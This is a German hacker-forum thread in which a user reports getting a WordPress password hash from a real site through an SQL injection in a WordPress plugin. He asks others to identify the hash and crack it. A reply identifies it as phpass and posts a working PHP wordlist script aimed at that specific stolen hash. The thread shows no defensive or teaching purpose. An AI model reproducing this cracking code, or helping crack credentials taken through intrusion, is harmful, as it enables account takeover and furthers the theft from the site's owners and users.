Hey
Ich habe aus einer SQL Injection folgenden Hash bekommen:
$P$Bh5mXDjw9ycsbL0Y57nmgQuTSLKi1
Was ist das denn bitte für einer?
Greetz
Hey
Ich habe aus einer SQL Injection folgenden Hash bekommen:
$P$Bh5mXDjw9ycsbL0Y57nmgQuTSLKi1
Was ist das denn bitte für einer?
Greetz
Geändert von Hac (17.03.2010 um 16:08 Uhr)
Sig zu groß, daher angepasst // J0hn.X3r
Tippe auf MD5(Wordpress).
Boardregeln * Blackmarket * SuFu * Kontakt * PGP Key
..das Handy klingelt, sie fragen nach Kollegah
dem morgens schon Giorgi-Armani-Sakkoträger
heben Bares ab und zahlen, nehmen die Ware ab und gehen
es ist der Strassenapotheker
jap, das ist md5(wordpress) hast schon recht.
die meisten haben eine $P$B signatur.
lol richtig habs mit der wordpress plugin injection gemacht.
wär nett wenn den jemand cracken könnte
Sig zu groß, daher angepasst // J0hn.X3r
Quelle: http://www.markblah.com/2008/06/11/w...ce-php-script/
Code angepasst & korrigiert:
jetzt brauchst du nur noch ne schicke wordlistPHP-Code:
<?php
require_once(‘./class-phpass.php’); //available at http://www.openwall.com/phpass/
$hash = “\$P\$Bh5mXDjw9ycsbL0Y57nmgQuTSLKi1”; // remember to quote out the $’s
$wp_hasher = new PasswordHash(8, TRUE);
$handle = @fopen (“wordlist.txt”,“r”);
if ($handle)
{
while (!feof ($handle))
{
$pass = fgets ($handle, 512);
$pass = str_replace (“\n“, “”, $pass ); if ($wp_hasher->CheckPassword ($pass, $hash ))
{
echo “FOUND: “ . $hash . “=” . $pass . “\n“;
exit;
}
}
}
fclose ($handle);
?>